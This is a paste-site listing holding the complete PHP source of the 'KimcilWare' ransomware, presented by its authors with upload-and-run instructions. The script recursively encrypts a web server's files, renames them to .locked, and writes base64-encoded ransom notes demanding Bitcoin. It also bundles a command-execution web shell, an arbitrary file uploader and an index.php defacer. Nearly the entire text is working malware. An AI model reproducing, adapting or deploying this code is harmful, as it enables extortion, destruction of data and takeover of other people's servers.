cyberking icon

KimcilWare Ransomware

cyberking | PRO | 03/22/17 09:29:25 AM UTC | 0 ⭐ | 5207 👁️ | Never ⏰ | []
PHP |

13.96 KB

|

None

|

0 👍

/

0 👎

<?php
 
/*
 * KimcilWare Ransomware
 * Created by : TUYUL JAHAT CREW ([email protected] / [email protected] / [email protected])
 *
 * do u want to ask?
 * just email me on [email protected] or [email protected] or [email protected]
 * For all the victims, thanks for letting us encrypt your data.
 * It's just for fun only.
 *
 * How to Use ? 
 * Just Upload and Open in your Browser
 * Default encrypted folder on public_html
 *
 * INDONESIAN PEOPLES ARE STILL BLACKHAT
 * TUYUL JAHAT CREW
 *
 */
 
 
set_time_limit(0);
error_reporting(0);
 
echo base64_decode('PGh0bWw+PGhlYWQ+PHRpdGxlPktJTUNJTFdBUkUgTE9DS0VSPC90aXRsZT4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCmZ1bmN0aW9uIHR1a2FyKGxhbWEsYmFydSl7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQobGFtYSkuc3R5bGUuZGlzcGxheSA9ICdub25lJzsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZChiYXJ1KS5zdHlsZS5kaXNwbGF5ID0gJ2Jsb2NrJzsNCn0NCjwvc2NyaXB0Pg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7DQoJYmFja2dyb3VuZDojMDAwMDAwOzsNCn0NCmEgew0KdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQp9DQphOmhvdmVyew0KYm9yZGVyLWJvdHRvbToxcHggc29saWQgIzAwZmYwMDsNCn0NCip7DQoJZm9udC1zaXplOjE0cHg7DQoJZm9udC1mYW1pbHk6QWdlbmN5IEZCLFRhaG9tYSxWZXJkYW5hLEFyaWFsOw0KCWNvbG9yOiMwMGZmMDA7DQp9DQojbWVudXsNCgliYWNrZ3JvdW5kOiMxMTExMTE7DQoJbWFyZ2luOjhweCAycHggNHB4IDJweDsNCn0NCiNtZW51IGF7DQoJcGFkZGluZzo0cHggMThweDsNCgltYXJnaW46MDsNCgliYWNrZ3JvdW5kOiMyMjIyMjI7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJbGV0dGVyLXNwYWNpbmc6MnB4Ow0KfQ0KI21lbnUgYTpob3ZlcnsNCgliYWNrZ3JvdW5kOiMxOTE5MTk7DQoJYm9yZGVyLWJvdHRvbToxcHggc29saWQgIzMzMzMzMzsNCglib3JkZXItdG9wOjFweCBzb2xpZCAjMzMzMzMzOw0KfQ0KLnRhYm5ldHsNCgltYXJnaW46MTVweCBhdXRvIDAgYXV0bzsNCglib3JkZXI6IDFweCBzb2xpZCAjMzMzMzMzOw0KfQ0KLm1haW4gew0KCXdpZHRoOjEwMCU7DQp9DQouZ2F5YSB7DQoJY29sb3I6ICMwMGZmMDA7DQp9DQouaW5wdXR6ew0KCWJhY2tncm91bmQ6IzExMTExMTsNCglib3JkZXI6MDsNCglwYWRkaW5nOjJweDsNCglib3JkZXItYm90dG9tOjFweCBzb2xpZCAjMjIyMjIyOw0KCWJvcmRlci10b3A6MXB4IHNvbGlkICMyMjIyMjI7DQp9DQouaW5wdXR6YnV0ew0KCWJhY2tncm91bmQ6IzExMTExMTsNCgljb2xvcjojMDBmZjAwOw0KCW1hcmdpbjowIDRweDsNCglib3JkZXI6MXB4IHNvbGlkICM0NDQ0NDQ7DQoNCn0NCi5pbnB1dHo6aG92ZXIsIC5pbnB1dHpidXQ6aG92ZXJ7DQoJYm9yZGVyLWJvdHRvbToxcHggc29saWQgIzAwZmYwMDsNCglib3JkZXItdG9wOjFweCBzb2xpZCAjMDBmZjAwOw0KfQ0KLm91dHB1dCB7DQoJbWFyZ2luOmF1dG87DQoJYm9yZGVyOjFweCBzb2xpZCAjMDBmZjAwOw0KCXdpZHRoOjEwMCU7DQoJaGVpZ2h0OjQwMHB4Ow0KCWJhY2tncm91bmQ6IzAwMDAwMDsNCglwYWRkaW5nOjAgMnB4Ow0KfQ0KLmNtZGJveHsNCgl3aWR0aDoxMDAlOw0KfQ0KLmhlYWRfaW5mb3sNCglwYWRkaW5nOiAwIDRweDsNCn0NCg0KPC9zdHlsZT4NCjwvaGVhZD4NCjxzY3JpcHQgbGFuZ3VhZ2U9J2phdmFzY3JpcHQnPg0KaWYgKGRvY3VtZW50LmFsbHx8ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQpew0KdmFyIHRoZXRpdGxlPWRvY3VtZW50LnRpdGxlDQpkb2N1bWVudC50aXRsZT0nJw0KfQ0KdmFyIGRhdGE9IkV4cGxvaXRpbmcgT3VyIFdvcmxkIFdpdGggT3VyIEV2aWwgQ29kZSEiOw0KdmFyIGRvbmU9MTsNCmZ1bmN0aW9uIHN0YXR1c0luKHRleHQpew0KZGVjcnlwdCh0ZXh0LDIyLDIyKTsNCn0NCmZ1bmN0aW9uIHN0YXR1c091dCgpew0Kc2VsZi5zdGF0dXM9Jyc7DQpkb25lPTE7DQp9DQpmdW5jdGlvbiBkZWNyeXB0KHRleHQsIG1heCwgZGVsYXkpew0KaWYgKGRvbmUpew0KZG9uZSA9IDA7DQpyYW50aXQodGV4dCwgbWF4LCBkZWxheSwgMCwgbWF4KTsNCn0gDQp9DQpmdW5jdGlvbiByYW50aXQodGV4dCwgcnVuc19sZWZ0LCBkZWxheSwgY2hhcnZhciwgbWF4KXsNCmlmICghZG9uZSl7DQpydW5zX2xlZnQgPSBydW5zX2xlZnQgLSAxOw0KdmFyIHN0YXR1cyA9IHRleHQuc3Vic3RyaW5nKDAsY2hhcnZhcik7DQpmb3IodmFyIGN1cnJlbnRfY2hhciA9IGNoYXJ2YXI7IGN1cnJlbnRfY2hhciA8IHRleHQubGVuZ3RoOyBjdXJyZW50X2NoYXIrKyl7DQpzdGF0dXMgKz0gZGF0YS5jaGFyQXQoTWF0aC5yb3VuZChNYXRoLnJhbmRvbSgpKmRhdGEubGVuZ3RoKSk7DQp9DQpkb2N1bWVudC50aXRsZSA9IHN0YXR1czsNCnZhciByZXJ1biA9ICJyYW50aXQoJyIgKyB0ZXh0ICsgIicsIiArIHJ1bnNfbGVmdCArICIsIiArIGRlbGF5ICsgIiwiICsgY2hhcnZhciArICIsIiArIG1heCArICIpOyINCnZhciBuZXdfY2hhciA9IGNoYXJ2YXIgKyAxOw0KdmFyIG5leHRfY2hhciA9ICJyYW50aXQoJyIgKyB0ZXh0ICsgIicsIiArIG1heCArICIsIiArIGRlbGF5ICsgIiwiICsgbmV3X2NoYXIgKyAiLCIgKyBtYXggKyAiKTsiDQppZihydW5zX2xlZnQgPiAwKXsNCnNldFRpbWVvdXQocmVydW4sIGRlbGF5KTsNCn0NCmVsc2V7DQppZiAoY2hhcnZhciA8IHRleHQubGVuZ3RoKXsNCnNldFRpbWVvdXQobmV4dF9jaGFyLCBNYXRoLnJvdW5kKGRlbGF5KihjaGFydmFyKzMpLyhjaGFydmFyKzEpKSk7DQp9DQplbHNlDQp7DQpkb25lID0gMTsNCn0NCn0NCn0NCn0NCmlmIChkb2N1bWVudC5hbGx8fGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKQ0Kc3RhdHVzSW4odGhldGl0bGUpDQo8L3NjcmlwdD4=');
echo '<br><div align="center"><img src="http://4.bp.blogspot.com/_2UbsSBz9ckE/S5rEF-706wI/AAAAAAAAA70/wD_mjvKfukw/s1600/Bio_Hazard_Black_Green_HD.jpg" width="300"><br><div id="menu"><font color=white face="agency fb"><b><a href="?"><font color="white">LOCKER</a><a href="?cmd"><font color="white">COMMAND</a><a href="?index"><font color="white">INDEX</a><a href="?upl"><font color="white">UPLOADER</a><a href="?delete"><font color="white">DELETE</a></b></div><br>';
 
class KimcilWare {
    protected $__LOCALDIR__;
    protected $__KIMCILWARE__;
    
    public function __construct() {
        $this->__LOCALDIR__ = $_SERVER["DOCUMENT_ROOT"];
        $this->__KIMCILWARE__ = basename($_SERVER['PHP_SELF']);
        return $this;
    }
    
    public function WriteInstruction($dir) {
        $readme = base64_decode("WyNdIENPTkdSQVRVTEFUSU9ODQpBTEwgWU9VUiBXRUJTRVJWRVIgRklMRVMgSEFTIEJFRU4gTE9DS0VEIEFORCBBTEwgREFUQUJBU0UgSEFTIEJFRU4gRFJPUEVEIQ0KDQpbI10gSE9XIFRPIFVOTE9DSyBNWSBGSUxFUyBBTkQgR0VUIEJBQ0sgTVkgREFUQUJBU0U/DQoNCllvdSBtdXN0IHNlbmQgbWUgNSBCVEMgdG8gdW5sb2NrIGFsbCB5b3VyIGZpbGVzLg0KU2VuZCB0byB0aGlzIEJUQyBBZGRyZXNzOiAxRU1acHRMNjZudlZMQ2Z5R1FOVzJiVHAxWFA2ZWM0Yld3DQpDb250YWN0IG00bjE0a0BzaWdhaW50Lm9yZyBhZnRlciB5b3Ugc2VuZCB0aGUgQlRDLiBKdXN0IGluZm9ybSBtZSB5b3VyIHdlYnNpdGUgdXJsIGFuZCB5b3VyIEJpdGNvaW4gQWRkcmVzcy4NCkkgd2lsbCBjaGVjayBteSBCaXRjb2luLCBpZiB5b3UgYXJlIHJlYWx5IHNlbmQgbWUgdGhlIEJUQyBJIHdpbGwgZ2l2ZSB5b3UgdGhlIGRlY3J5cHRpb24gcGFja2FnZSB0byB1bmxvY2sgYWxsIHlvdXIgZmlsZXMuDQpEb24ndCB0cnkgdG8gcmVwYWlyIHlvdXIgc2l0ZSBieSB5b3Vyc2VsZiBvciB3ZSB3aWxsIGxlYWsgYWxsIGRhdGEgaW4gdGhpcyBzaXRlLg0KDQpbI10gRi5BLlENCg0KUTpXaGF0IGlzIEJpdGNvaW4/DQpBOlRvIGtub3cgYWJvdXQgQml0Y29pbiB5b3UgY2FuIHJlYWQgaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQml0Y29pbg0KUTpEbyB5b3UgYWNjZXB0IGFub3RoZXIgcGF5bWVudD8NCkE6Tm8sIEkganVzdCBhY2NlcHQgQml0Y29pbiA7KQ0KUTpJIGRvbid0IGhhdmUgQml0Y29pbiwgd2hhdCBtdXN0IEkgZG8/DQpBOklmIHlvdSBkb24ndCBoYXZlIEJpdGNvaW4geW91IGNhbiBSZWdpc3RlciBhIG5ldyBCaXRjb2luIEFkZHJlc3MgaW4gaHR0cHM6Ly9ibG9ja2NoYWluLmluZm8uDQpROkhvdyB0byBnZXQgQml0Y29pbiBiYWxhbmNlPw0KQTpGb3IgdGhlIEJpdGNvaW4gYmFsYW5jZSB5b3UgY2FuIGJ1eSBpbiBodHRwOi8vbG9jYWxjb2lucy5jb20sIGh0dHA6Ly9idGMtZS5jb20sIG9yIGFub3RoZXIgc2l0ZSBpbiB0aGUgSW50ZXJuZXQuDQoNCkJlc3QgUmVnYXJkcywNClRoMy5NNG4xYWtfYzBkM3o=");
        $file = fopen("".$dir."/README_FOR_UNLOCK.txt", "w");
        fwrite($file, $readme);
        fclose($file);
    }
 
    private function GetFileTarget($dir) {
        foreach(glob($dir."/*") as $target) {
            $this->EncryptData($target);
            if(is_dir($target)) {
                $this->WriteInstruction($target);
                $this->GetFileTarget($target);
            }
        }
    }
 
    public function GenerateKey() {
        $key[1] = $_SERVER["DOCUMENT_ROOT"];
        $key[2] = $_SERVER['SERVER_NAME'];
        $key[3] = $_SERVER["REMOTE_ADDR"];
        $key[4] = $key[1]."KI".$key[2]."MC".date('Y/m/d')."IL".date('d-/Y:m').$key[3]."MEMEKB4saH".date('m-Y-Y').date('m-Y-m').date('m-d-d');
        $key[5] = substr(md5(urlencode(md5(gzcompress(md5(base64_encode(md5(sha1("ENC&crYpt3d".$key[4])))))))),0,25);
        return $key[5];
    }
 
    private function EvilEncrypt($sSecretKey, $sValue) {
        return rtrim(base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $sSecretKey, $sValue, MCRYPT_MODE_ECB, mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB), MCRYPT_RAND))), "\0");
    }
    
    private function Base96code($sValue) {
        $encrypt[1] = base64_encode($sValue);
        $encrypt[2] = strrev($encrypt[1]);
        $encrypt[3] = base64_decode($encrypt[2]);
        return $encrypt[3];
    }
    
    private function EncryptData($file) {
        if(file_exists($file) && file != $this->__KIMCILWARE__) {
            $newExstension = "locked";
            $log_file = fopen("".$_SERVER["DOCUMENT_ROOT"]."/LIST_LOCKED_FILES.txt", "a");
            $thisFile = "".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php";
            if(!stristr($file,$thisFile)) {
                if(stristr($file,".".$newExstension."")) {
                    fwrite($log_file, "[1]:".$file."\n");
                } elseif(stristr($file,"README_FOR_UNLOCK.txt")) {
                    fwrite($log_file, "[2]:".$file."\n");
                } elseif(stristr($file,"LIST_LOCKED_FILES.txt")) {
                    fwrite($log_file, "[3]:".$file."\n");
                } else {
                    $tempFile = file_get_contents($file);
                    if($tempFile) {
                        $encrypt = fopen($file, "w");
                        fwrite($encrypt,$this->Base96code($this->EvilEncrypt($this->GenerateKey(), $tempFile)));
                        fclose($encrypt);
                        if($encrypt) {
                            fwrite($log_file, "[0]:".$file.".".$newExstension."\n");
                            return rename($file,$file.".".$newExstension);
                        }
                    }
                }
            }
            fclose($log_file);
        }
    }
 
    public function ExecuteEncrypter($dir) {
        $encrypt = $this->GetFileTarget($dir);
        return $encrypt;
    }
 
}
 
$KimcilWare = new KimcilWare();
echo '<b><font color="white">Unlocked Key:</b> <font color=#00ff00>'.$KimcilWare->GenerateKey().'</font> <b>Kernel:</b> <font color=#00ff00>'.php_uname().'</font> <b>Domain:</b> <font color=#00ff00>http://'.$_SERVER["SERVER_NAME"].'</font> <b>IP Adress:</b> <font color=#00ff00>'.$_SERVER["REMOTE_ADDR"].'</font></font><br><br>';
if(isset($_GET['cmd'])) {
    echo '<form action="" method="post" enctype="multipart/form-data" name="cmd" id="cmd">';
    echo '<input class="inputzbut" type="text" name="do" size="50" placeholder="Your shell command">';
    echo '<input class="inputzbut" name="_cmd" type="submit" id="_atck" value="ENTER"></form><br>';
    echo '<div align="left"><pre>';
    if(!empty($_POST['_cmd'])) {
        $cmd = ($_POST["do"]);
        system($cmd);
        echo "<b><font color=aqua>Command:</font></b> ".$cmd."</pre>";
    }
} elseif(isset($_GET['upl'])) {
    echo '<form action="?upl" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input class="inputzbut" type="file" name="file" size="50"><input class="inputzbut" name="_upl" type="submit" id="_upl" value="UPLOAD"></form>';
    if(!empty($_POST['_upl'])) {
        if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo '<b><font color="#00FF00">Upload SUKSES !!!</font></b><br><br>';
        } else {
            echo '<b><font color="red">Upload GAGAL !!!</b></font><br><br>';
        }
    }
} elseif(isset($_GET['index'])) {
$deface=
'<?php
 
$readme = "PHRpdGxlPldFQlNFUlZFUiBFTkNSWVBURUQ8L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCglib2R5e2JhY2tncm91bmQtY29sb3I6ICMwMDA7Zm9udC1mYW1pbHk6IGNvdXJpZXIgbmV3O2ZvbnQtc2l6ZToxMnB4O2NvbG9yOiNGRkZGRkY7fQ0KPC9zdHlsZT4NCjxjZW50ZXI+PGltZyBzcmM9Imh0dHBzOi8vcy1tZWRpYS1jYWNoZS1hazAucGluaW1nLmNvbS83MzZ4L2VmLzM0LzA2L2VmMzQwNmIzYjNmODRlN2MwMmM4YmUxMzFkNmUwNGY0LmpwZyIgd2lkdGg9IjQwMCIgLz48YnI+DQo8Zm9udCBjb2xvcj1yZWQgc2l6ZT0iNSIgZmFjZT0iYWdlbmN5IGZiIj5DT05HUkFUVUxBVElPTi4gQUxMIFlPVVIgV0VCU0VSVkVSIEZJTEVTIEhBUyBCRUVOIExPQ0tFRC4gQU5EIEFMTCBEQVRBQkFTRSBIQVMgQkVFTiBEUk9QRUQhPC9mb250Pjxicj48L2NlbnRlcj4NCjxwcmU+DQpbI10gSE9XIFRPIFVOTE9DSyBNWSBGSUxFUyBBTkQgR0VUIEJBQ0sgTVkgREFUQUJBU0U/DQoNCllvdSBtdXN0IHNlbmQgbWUgPGZvbnQgY29sb3I9cmVkPjUgQlRDPC9mb250PiB0byB1bmxvY2sgYWxsIHlvdXIgZmlsZXMuDQpTZW5kIHRvIHRoaXMgQlRDIEFkZHJlc3M6IDxmb250IGNvbG9yPXJlZD4xRU1acHRMNjZudlZMQ2Z5R1FOVzJiVHAxWFA2ZWM0Yld3PC9mb250Pg0KQ29udGFjdCA8Zm9udCBjb2xvcj1wdXJwbGU+bTRuMTRrQHNpZ2FpbnQub3JnPC9mb250PiBhZnRlciB5b3Ugc2VuZCB0aGUgQlRDLiBKdXN0IGluZm9ybSBtZSB5b3VyIHdlYnNpdGUgdXJsIGFuZCB5b3VyIEJpdGNvaW4gQWRkcmVzcy4NCkkgd2lsbCBjaGVjayBteSBCaXRjb2luLCBpZiB5b3UgYXJlIHJlYWx5IHNlbmQgbWUgdGhlIEJUQyBJIHdpbGwgZ2l2ZSB5b3UgdGhlIGRlY3J5cHRpb24gcGFja2FnZSB0byB1bmxvY2sgYWxsIHlvdXIgZmlsZXMuDQpEb24ndCB0cnkgdG8gcmVwYWlyIHlvdXIgc2l0ZSBieSB5b3Vyc2VsZiBvciB3ZSB3aWxsIGxlYWsgYWxsIGRhdGEgaW4gdGhpcyBzaXRlLg0KDQpbI10gRi5BLlENCg0KUTpXaGF0IGlzIEJpdGNvaW4/DQpBOlRvIGtub3cgYWJvdXQgQml0Y29pbiB5b3UgY2FuIHJlYWQgPGZvbnQgY29sb3I9cHVycGxlPmh0dHBzOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0JpdGNvaW48L2ZvbnQ+DQpROkRvIHlvdSBhY2NlcHQgYW5vdGhlciBwYXltZW50Pw0KQTpObywgSSBqdXN0IGFjY2VwdCBCaXRjb2luIDspDQpROkkgZG9uJ3QgaGF2ZSBCaXRjb2luLCB3aGF0IG11c3QgSSBkbz8NCkE6SWYgeW91IGRvbid0IGhhdmUgQml0Y29pbiB5b3UgY2FuIFJlZ2lzdGVyIGEgbmV3IEJpdGNvaW4gQWRkcmVzcyBpbiA8Zm9udCBjb2xvcj1wdXJwbGU+aHR0cHM6Ly9ibG9ja2NoYWluLmluZm88L2ZvbnQ+Lg0KUTpIb3cgdG8gZ2V0IEJpdGNvaW4gYmFsYW5jZT8NCkE6Rm9yIHRoZSBCaXRjb2luIGJhbGFuY2UgeW91IGNhbiBidXkgaW4gPGZvbnQgY29sb3I9cHVycGxlPmh0dHA6Ly9sb2NhbGNvaW5zLmNvbTwvZm9udD4sIDxmb250IGNvbG9yPXB1cnBsZT5odHRwOi8vYnRjLWUuY29tPC9mb250Piwgb3IgYW5vdGhlciBzaXRlIGluIHRoZSBJbnRlcm5ldC4NCg0KQmVzdCBSZWdhcmRzLA0KPGZvbnQgY29sb3I9cHVycGxlPlRoMy5NNG4xYWtfYzBkM3o8L2ZvbnQ+DQo8L3ByZT4=";
echo base64_decode($readme);
 
?>';
?>
<form ENCTYPE="multipart/form-data" action="?index" method='post'>
<textarea readonly="readonly" style='background:black;outline:none;' name='index' rows='10' cols='90'>
<?php 
echo $deface;
?>
</textarea><br><br><center>
<input class="inputzbut" type='text' name='path' size='30' value="<?php echo $_SERVER['DOCUMENT_ROOT'];?>">
<input class="inputzbut" type='submit' name='_do' value="DEFACE"></center></form><br>
<?php
if(!empty($_POST['_do'])) {
    $mainpath = $_POST[path];
    $file = "index.php";
    $code = base64_encode($_POST[index]);
    $indx = base64_decode($code);
    $start = @fopen("$mainpath/$file","w+");
    $finish = @fwrite($start,$indx);
    if ($finish){
        echo "$mainpath/$file - Defacing Done<br>";
    }}
} elseif(isset($_GET['delete'])) {
    $file = "".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php";
    $delete = unlink($file);
    echo "<b><font color=red>".$file."</a></font></b> has been deleted";
} else {
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input class="inputzbut" type="text" name="dir" size="50" value="'.$_SERVER["DOCUMENT_ROOT"].'">';
    echo '<input class="inputzbut" name="_atck" type="submit" id="_atck" value="LOCK"></form>';
    echo '<div align="left"><br>';
    if(!empty($_POST['_atck'])) {
        echo '<font color="aqua"><center>Directory <b>'.$_POST['dir'].'</b> has been encrypted<br>';
        echo 'Locked Files: <a target="_blank" href="/LIST_LOCKED_FILES.txt"><font color=white><b>LIST_LOCKED_FILES.txt</b></font></a> Readme Files: <a target="_blank" href="/README_FOR_UNLOCK.txt"><font color=white><b>README_FOR_UNLOCK.txt</b></font></a></center>';
        $directory = $_POST['dir'];
        $KimcilWare->WriteInstruction($directory);
        $KimcilWare->ExecuteEncrypter($directory);
    }
}
 
/*
 * COPYRIGHT @2016 KIMCILWARE RANSOMWARE
 */
 
?>

Comments